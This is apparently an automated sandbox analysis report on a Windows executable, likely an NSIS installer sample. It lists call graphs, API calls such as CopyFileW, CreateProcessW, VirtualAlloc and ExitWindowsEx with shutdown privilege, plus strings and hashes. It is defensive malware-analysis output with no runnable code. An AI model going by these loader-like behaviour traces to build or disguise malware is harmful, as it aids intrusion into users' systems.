2 API calls 4612->4616 4613->4589 4617 403887 4615->4617 4618 40388e SetCurrentDirectoryW 4616->4618 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4627 4061ae 36 API calls 4626->4627 4627->4629 4628 4061ae 36 API calls 4628->4631 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4628 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4639 403480 4637->4639 4638 40348a 4638->4566 4639->4638 4640 405cbd 3 API calls 4639->4640 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4675 402f80 4648->4675 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4665 402fbe 4654->4665 4656 402e8e 32 API calls 4655->4656 4658 4030af 4656->4658 4657 403447 ReadFile 4657->4665 4660 4030eb GlobalAlloc 4658->4660 4658->4675 4761 40345d SetFilePointer 4658->4761 4659 403143 4663 402e8e 32 API calls 4659->4663 4662 403102 4660->4662 4668 405f0d 2 API calls 4662->4668 4663->4675 4664 4030cc 4666 403447 ReadFile 4664->4666 4665->4655 4665->4657 4665->4659 4667 402e8e 32 API calls 4665->4667 4665->4675 4669 4030d7 4666->4669 4667->4665 4670 403113 CreateFileW 4668->4670 4669->4660 4669->4675 4671 40314d 4670->4671 4670->4675 4760 40345d SetFilePointer 4671->4760 4673 40315b 4674 4031d6 44 API calls 4673->4674 4674->4675 4675->4573 4675->4675 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4684 403b53 lstrcatW 4682->4684 4685 4062b6 3 API calls 4682->4685 4686 403b02 4684->4686 4685->4684 4762 403dae 4686->4762 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4693 4062b6 3 API calls 4690->4693 4692 405dc5 18 API calls 4691->4692 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4697 40640a 17 API calls 4694->4697 4695->4691 4702 403bd8 lstrlenW 4695->4702 4706 405cea CharNextW 4695->4706 4698 403cd5 4696->4698 4699 403c56 RegisterClassW 4696->4699 4697->4696 4701 40140b 2 API calls 4698->4701 4700 403c8c SystemParametersInfoW CreateWindowExW 4699->4700 4731 403cdf 4699->4731 4700->4698 4705 403cdb 4701->4705 4703 403be6 lstrcmpiW 4702->4703 4704 403c0c 4702->4704 4703->4704 4707 403bf6 GetFileAttributesW 4703->4707 4708 405cbd 3 API calls 4704->4708 4711 403dae 18 API calls 4705->4711 4705->4731 4709 403bd5 4706->4709 4710 403c02 4707->4710 4712 403c12 4708->4712 4709->4702 4710->4704 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4704 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4721 403d10 4719->4721 4720 403d81 4722 403d85 4720->4722 4723 403d9d 4720->4723 4724 403d1e GetClassInfoW 4721->4724 4726 406752 3 API calls 4721->4726 4730 40140b 2 API calls 4722->4730 4722->4731 4725 40140b 2 API calls 4723->4725 4727 403d32 GetClassInfoW RegisterClassW 4724->4727 4728 403d48 DialogBoxParamW 4724->4728 4725->4731 4726->4724 4727->4728 4729 40140b 2 API calls 4728->4729 4729->4731 4730->4731 4731->4629 4732->4578 4733->4610 4734->4579 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4586 4743->4587 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4673 4761->4664 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4691 4773 4043ab SendMessageW 4772->4773 4776 405546 4773->4776 4774 40556d 4775 4043ab SendMessageW 4774->4775 4777 40557f OleUninitialize 4775->4777 4776->4774 4778 401389 2 API calls 4776->4778 4777->4720 4778->4776 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5893 404ba6 5894 404bd2 5893->5894 5895 404bb6 5893->5895 5897 404c05 5894->5897 5898 404bd8 SHGetPathFromIDListW 5894->5898 5904 405a32 GetDlgItemTextW 5895->5904 5900 404be8 5898->5900 5903 404bef SendMessageW 5898->5903 5899 404bc3 SendMessageW 5899->5894 5901 40140b 2 API calls 5900->5901 5901->5903 5903->5897 5904->5899 5919 700910e1 5928 70091111 5919->5928 5920 700911d8 GlobalFree 5921 700912ba 2 API calls 5921->5928 5922 700911d3 5922->5920 5923 700911f8 GlobalFree 5923->5928 5924 70091272 2 API calls 5927 700911c4 GlobalFree 5924->5927 5925 70091164 GlobalAlloc 5925->5928 5926 700912e1 lstrcpyW 5926->5928 5927->5928 5928->5920 5928->5921 5928->5922 5928->5923 5928->5924 5928->5925 5928->5926 5928->5927 5929 4029a8 5930 402c1f 17 API calls 5929->5930 5931 4029ae 5930->5931 5932 4029d5 5931->5932 5933 4029ee 5931->5933 5938 40288b 5931->5938 5934 4029da 5932->5934 5942 4029eb 5932->5942 5935 402a08 5933->5935 5936 4029f8 5933->5936 5943 4063e8 lstrcpynW 5934->5943 5939 40640a 17 API calls 5935->5939 5937 402c1f 17 API calls 5936->5937 5937->5942 5939->5942 5942->5938 5944 40632f wsprintfW 5942->5944 5943->5938 5944->5938 5945 4028ad 5946 402c41 17 API calls 5945->5946 5947 4028bb 5946->5947 5948 4028d1 5947->5948 5949 402c41 17 API calls 5947->5949 5950 405eb9 2 API calls 5948->5950 5949->5948 5951 4028d7 5950->5951 5973 405ede GetFileAttributesW CreateFileW 5951->5973 5953 4028e4 5954 4028f0 GlobalAlloc 5953->5954 5955 402987 5953->5955 5956 402909 5954->5956 5957 40297e CloseHandle 5954->5957 5958 4029a2 5955->5958 5959 40298f DeleteFileW 5955->5959 5974 40345d SetFilePointer 5956->5974 5957->5955 5959->5958 5961 40290f 5962 403447 ReadFile 5961->5962 5963 402918 GlobalAlloc 5962->5963 5964 402928 5963->5964 5965 40295c 5963->5965 5967 4031d6 44 API calls 5964->5967 5966 405f90 WriteFile 5965->5966 5968 402968 GlobalFree 5966->5968 5972 402935 5967->5972 5969 4031d6 44 API calls 5968->5969 5971 40297b 5969->5971 5970 402953 GlobalFree 5970->5965 5971->5957 5972->5970 5973->5953 5974->5961 5982 401a30 5983 402c41 17 API calls 5982->5983 5984 401a39 ExpandEnvironmentStringsW 5983->5984 5985 401a4d 5984->5985 5987 401a60 5984->5987 5986 401a52 lstrcmpW 5985->5986 5985->5987 5986->5987 5063 402032 5064 402044 5063->5064 5065 4020f6 5063->5065 5066 402c41 17 API calls 5064->5066 5067 401423 24 API calls 5065->5067 5068 40204b 5066->5068 5073 402250 5067->5073 5069 402c41 17 API calls 5068->5069 5070 402054 5069->5070 5071 40206a LoadLibraryExW 5070->5071 5072 40205c GetModuleHandleW 5070->5072 5071->5065 5074 40207b 5071->5074 5072->5071 5072->5074 5086 406831 WideCharToMultiByte 5074->5086 5077 4020c5 5081 405450 24 API calls 5077->5081 5078 40208c 5079 402094 5078->5079 5080 4020ab 5078->5080 5082 401423 24 API calls 5079->5082 5089 70091777 5080->5089 5083 40209c 5081->5083 5082->5083 5083->5073 5084 4020e8 FreeLibrary 5083->5084 5084->5073 5087 40685b GetProcAddress 5086->5087 5088 402086 5086->5088 5087->5088 5088->5077 5088->5078 5090 700917aa 5089->5090 5131 70091b5f 5090->5131 5092 700917b1 5093 700918d6 5092->5093 5094 700917c9 5092->5094 5095 700917c2 5092->5095 5093->5083 5165 70092394 5094->5165 5181 70092352 5095->5181 5100 700917ee 5101 7009182d 5100->5101 5102 7009180f 5100->5102 5105 7009187e 5101->5105 5106 70091833 5101->5106 5194 70092569 5102->5194 5103 700917f8 5103->5100 5191 70092d37 5103->5191 5104 700917df 5108 700917f0 5104->5108 5109 700917e5 5104->5109 5113 70092569 10 API calls 5105->5113 5213 700915c6 5106->5213 5185 70092724 5108->5185 5109->5100 5175 70092aac 5109->5175 5118 7009186f 5113->5118 5114 70091815 5205 700915b4 5114->5205 5123 700918c5 5118->5123 5219 7009252c 5118->5219 5120 700917f6 5120->5100 5121 70092569 10 API calls 5121->5118 5123->5093 5125 700918cf GlobalFree 5123->5125 5125->5093 5128 700918b1 5128->5123 5223 7009153d wsprintfW 5128->5223 5129 700918aa FreeLibrary 5129->5128 5226 7009121b GlobalAlloc 5131->5226 5133 70091b83 5227 7009121b GlobalAlloc 5133->5227 5135 70091da9 GlobalFree GlobalFree GlobalFree 5136 70091dc6 5135->5136 5151 70091e10 5135->5151 5137 70092192 5136->5137 5145 70091ddb 5136->5145 5136->5151 5139 700921b4 GetModuleHandleW 5137->5139 5137->5151 5138 70091c64 GlobalAlloc 5157 70091b8e 5138->5157 5142 700921da 5139->5142 5143 700921c5 LoadLibraryW 5139->5143 5140 70091caf lstrcpyW 5144 70091cb9 lstrcpyW 5140->5144 5141 70091ccd GlobalFree 5141->5157 5234 7009161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5142->5234 5143->5142 5143->5151 5144->5157 5145->5151 5230 7009122c 5145->5230 5147 7009222c 5149 70092239 lstrlenW 5147->5149 5147->5151 5235 7009161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5149->5235 5150 70092064 5233 7009121b GlobalAlloc 5150->5233 5151->5092 5152 700921ec 5152->5147 5163 70092216 GetProcAddress 5152->5163 5154 700920ec 5154->5151 5160 70092134 lstrcpyW 5154->5160 5156 70092253 5156->5151 5157->5135 5157->5138 5157->5140 5157->5141 5157->5144 5157->5150 5157->5151 5157->5154 5158 70091d0b 5157->5158 5159 70091fa5 GlobalFree 5157->5159 5161 7009122c 2 API calls 5157->5161 5158->5157 5228 7009158f GlobalSize GlobalAlloc 5158->5228 5159->5157 5160->5151 5161->5157 5163->5147 5164 7009206d 5164->5092 5172 700923ac 5165->5172 5167 700924d5 GlobalFree 5170 700917cf 5167->5170 5167->5172 5168 7009247f GlobalAlloc CLSIDFromString 5168->5167 5169 70092454 GlobalAlloc WideCharToMultiByte 5169->5167 5170->5100 5170->5103 5170->5104 5171 7009122c GlobalAlloc lstrcpynW 5171->5172 5172->5167 5172->5168 5172->5169 5172->5171 5174 7009249e 5172->5174 5237 700912ba 5172->5237 5174->5167 5241 700926b8 5174->5241 5177 70092abe 5175->5177 5176 70092b63 EnumWindows 5180 70092b81 5176->5180 5177->5176 5179 70092c4d 5179->5100 5244 70092a56 5180->5244 5182 70092367 5181->5182 5183 70092372 GlobalAlloc 5182->5183 5184 700917c8 5182->5184 5183->5182 5184->5094 5189 70092754 5185->5189 5186 700927ef GlobalAlloc 5190 70092812 5186->5190 5187 70092802 5188 70092808 GlobalSize 5187->5188 5187->5190 5188->5190 5189->5186 5189->5187 5190->5120 5192 70092d42 5191->5192 5193 70092d82 GlobalFree 5192->5193 5248 7009121b GlobalAlloc 5194->5248 5196 700925ec MultiByteToWideChar 5201 70092573 5196->5201 5197 7009261f lstrcpynW 5197->5201 5198 7009260e StringFromGUID2 5198->5201 5199 70092656 GlobalFree 5199->5201 5200 70092632 wsprintfW 5200->5201 5201->5196 5201->5197 5201->5198 5201->5199 5201->5200 5202 7009268b GlobalFree 5201->5202 5203 70091272 2 API calls 5201->5203 5249 700912e1 5201->5249 5202->5114 5203->5201 5253 7009121b GlobalAlloc 5205->5253 5207 700915b9 5208 700915c6 2 API calls 5207->5208 5209 700915c3 5208->5209 5210 70091272 5209->5210 5211 7009127b GlobalAlloc lstrcpynW 5210->5211 5212 700912b5 GlobalFree 5210->5212 5211->5212 5212->5118 5214 700915ff lstrcpyW 5213->5214 5215 700915d2 wsprintfW 5213->5215 5218 70091618 5214->5218 5215->5218 5218->5121 5220 7009253a 5219->5220 5222 70091891 5219->5222 5221 70092556 GlobalFree 5220->5221 5220->5222 5221->5220 5222->5128 5222->5129 5224 70091272 2 API calls 5223->5224 5225 7009155e 5224->5225 5225->5123 5226->5133 5227->5157 5229 700915ad 5228->5229 5229->5158 5236 7009121b GlobalAlloc 5230->5236 5232 7009123b lstrcpynW 5232->5151 5233->5164 5234->5152 5235->5156 5236->5232 5238 700912c1 5237->5238 5239 7009122c 2 API calls 5238->5239 5240 700912df 5239->5240 5240->5172 5242 7009271c 5241->5242 5243 700926c6 VirtualAlloc 5241->5243 5242->5174 5243->5242 5245 70092a61 5244->5245 5246 70092a71 5245->5246 5247 70092a66 GetLastError 5245->5247 5246->5179 5247->5246 5248->5201 5250 700912ea 5249->5250 5251 7009130c 5249->5251 5250->5251 5252 700912f0 lstrcpyW 5250->5252 5251->5201 5252->5251 5253->5207 5993 700922fd 5994 70092367 5993->5994 5995 70092372 GlobalAlloc 5994->5995 5996 70092391 5994->5996 5995->5994 5997 402a35 5998 402c1f 17 API calls 5997->5998 5999 402a3b 5998->5999 6000 402a72 5999->6000 6001 40288b 5999->6001 6003 402a4d 5999->6003 6000->6001 6002 40640a 17 API calls 6000->6002 6002->6001 6003->6001 6005 40632f wsprintfW 6003->6005 6005->6001 6006 401735 6007 402c41 17 API calls 6006->6007 6008 40173c SearchPathW 6007->6008 6009 4029e6 6008->6009 6010 401757 6008->6010 6010->6009 6012 4063e8 lstrcpynW 6010->6012 6012->6009 6013 4014b8 6014 4014be 6013->6014 6015 401389 2 API calls 6014->6015 6016 4014c6 6015->6016 6017 401db9 GetDC 6018 402c1f 17 API calls 6017->6018 6019 401dcb GetDeviceCaps MulDiv ReleaseDC 6018->6019 6020 402c1f 17 API calls 6019->6020 6021 401dfc 6020->6021 6022 40640a 17 API calls 6021->6022 6023 401e39 CreateFontIndirectW 6022->6023 6024 402592 6023->6024 6025 40283b 6026 402843 6025->6026 6027 402847 FindNextFileW 6026->6027 6029 402859 6026->6029 6027->6029 6028 4029e6 6029->6028 6031 4063e8 lstrcpynW 6029->6031 6031->6028

                                                                                                            Executed Functions

                                                                                                            Function 004034A5 Relevance: 80.9, APIs: 32, Strings: 14, Instructions: 410stringfilecomCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 30->33 34 4035db-4035df 30->34 31->30 31->31 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 54 4036b2-4036b3 36->54 55 4036b4-4036ba 36->55 42 4035f2-4035fa 37->42 43 40360b-403644 37->43 38->39 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->53 56 403814-403824 call 4039e6 OleUninitialize 39->56 57 403769-40376f 39->57 47 403601 42->47 48 4035fc-4035ff 42->48 49 403661-40369b 43->49 50 403646-40364b 43->50 47->43 48->43 48->47 49->36 52 40369d-4036a1 49->52 50->49 58 40364d-403655 50->58 52->36 59 4036c2-4036d0 call 4063e8 52->59 53->39 53->56 54->55 55->28 61 4036c0 55->61 75 40394a-403950 56->75 76 40382a-40383a call 405a4e ExitProcess 56->76 62 403804-40380b call 403ad8 57->62 63 403775-403780 call 405cea 57->63 65 403657-40365a 58->65 66 40365c 58->66 68 4036d5 59->68 61->68 74 403810 62->74 79 403782-4037b7 63->79 80 4037ce-4037d8 63->80 65->49 65->66 66->49 68->29 74->56 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 85 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->85 86 40399e-4039ac call 4067c2 77->86 88 4039d8 78->88 89 4039dc-4039e0 ExitProcess 78->89 87 4037b9-4037bd 79->87 82 403840-403854 call 4059b9 lstrcatW 80->82 83 4037da-4037e8 call 405dc5 80->83 100 403861-40387b lstrcatW lstrcmpiW 82->100 101 403856-40385c lstrcatW 82->101 83->56 99 4037ea-403800 call 4063e8 * 2 83->99 85->86 102 4039ba-4039c5 ExitWindowsEx 86->102 103 4039ae-4039b8 86->103 93 4037c6-4037ca 87->93 94 4037bf-4037c4 87->94 88->89 93->87 98 4037cc 93->98 94->93 94->98 98->80 99->62 100->56 105 40387d-403880 100->105 101->100 102->78 106 4039c7-4039c9 call 40140b 102->106 103->102 103->106 108 403882-403887 call 40591f 105->108 109 403889 call 40599c 105->109 106->78 117 40388e-40389c SetCurrentDirectoryW 108->117 109->117 118 4038a9-4038d2 call 4063e8 117->118 119 40389e-4038a4 call 4063e8 117->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 129 40393e-403945 call 4061ae 126->129 127->126 128 403907-403927 call 4061ae call 40640a call 4059d1 127->128 128->126 138 403929-403930 CloseHandle 128->138 129->56 138->126
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE ref: 004034C8
                                                                                                            • GetVersion.KERNEL32 ref: 004034CE
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                                                                            • OleInitialize.OLE32(00000000), ref: 00403545
                                                                                                            • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                                                                            • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                                                                            • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                                                                            • ExitProcess.KERNEL32 ref: 0040383A
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\rXKfKM0T49.exe,00420EE8,?,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\rXKfKM0T49.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-4259682330
                                                                                                            • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E
                                                                                                            Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 158 4051c7-4051cf 152->158 159 405158-40515e 152->159 153->154 154->151 161 405089-40508c 155->161 162 4050fc-4050ff 155->162 156->152 156->155 190 404f33-404f39 157->190 191 404ff8-40500b GetWindowLongW SetWindowLongW 157->191 167 4051d1-4051d7 SendMessageW 158->167 168 4051d9-4051e0 158->168 164 405164-40516e 159->164 165 4053af-4053c1 call 4043c6 159->165 170 405097-4050ac call 404d1a 161->170 171 40508e-405095 161->171 162->152 166 405101-40510b 162->166 164->165 173 405174-405183 SendMessageW 164->173 175 40511b-405125 166->175 176 40510d-405119 SendMessageW 166->176 167->168 177 4051e2-4051e9 168->177 178 405214-40521b 168->178 170->162 200 4050ae-4050bf 170->200 171->162 171->170 173->165 184 405189-40519a SendMessageW 173->184 175->152 186 405127-405131 175->186 176->175 187 4051f2-4051f9 177->187 188 4051eb-4051ec ImageList_Destroy 177->188 182 405371-405378 178->182 183 405221-40522d call 4011ef 178->183 182->165 195 40537a-405381 182->195 211 40523d-405240 183->211 212 40522f-405232 183->212 193 4051a4-4051a6 184->193 194 40519c-4051a2 184->194 196 405142-40514c 186->196 197 405133-405140 186->197 198 405202-40520e 187->198 199 4051fb-4051fc GlobalFree 187->199 188->187 202 404f3c-404f43 190->202 206 405011-405015 191->206 204 4051a7-4051c0 call 401299 SendMessageW 193->204 194->193 194->204 195->165 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 195->205 196->152 197->152 198->178 199->198 200->162 201 4050c1-4050c3 200->201 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->158 205->165 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 217 4050d2-4050d4 207->217 218 4050ce-4050d0 207->218 221 4050d9-4050f5 call 40117d 208->221 209->202 225 404ff2-404ff6 209->225 219 404f73-404fa9 SendMessageW 210->219 220 404fab-404fad 210->220 226 405281-4052a5 call 4011ef 211->226 227 405242-40525b call 4012e2 call 401299 211->227 222 405234 212->222 223 405235-405238 call 404d9a 212->223 214->165 215->140 217->221 218->221 219->209 229 404fc0-404fd6 SendMessageW 220->229 230 404faf-404fbe SendMessageW 220->230 221->162 222->223 223->211 225->191 225->206 241 405347-40535b InvalidateRect 226->241 242 4052ab 226->242 247 40526b-40527a SendMessageW 227->247 248 40525d-405263 227->248 229->209 230->209 241->182 243 40535d-40536c call 404ced call 404cd5 241->243 244 4052ae-4052b9 242->244 243->182 249 4052bb-4052ca 244->249 250 40532f-405341 244->250 247->226 251 405265 248->251 252 405266-405269 248->252 254 4052cc-4052d9 249->254 255 4052dd-4052e0 249->255 250->241 250->244 251->252 252->247 252->248 254->255 257 4052e2-4052e5 255->257 258 4052e7-4052f0 255->258 259 4052f5-40532d SendMessageW * 2 257->259 258->259 260 4052f2 258->260 259->250 260->259
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
